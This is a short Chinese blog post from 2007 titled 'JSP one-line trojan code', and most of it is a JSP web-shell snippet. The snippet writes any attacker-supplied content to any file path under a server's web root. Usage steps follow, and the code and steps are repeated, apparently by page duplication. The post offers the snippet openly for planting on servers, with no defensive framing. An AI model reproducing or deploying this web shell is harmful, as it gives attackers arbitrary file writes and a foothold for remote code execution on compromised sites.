07-10
09
JSP一句话木马代码
作者:Java伴侣 日期:2007-10-09
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld
然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 HelloWorld
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld
然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 HelloWorld
评论: 0 | 引用: 0 | 查看次数: 1195
发表评论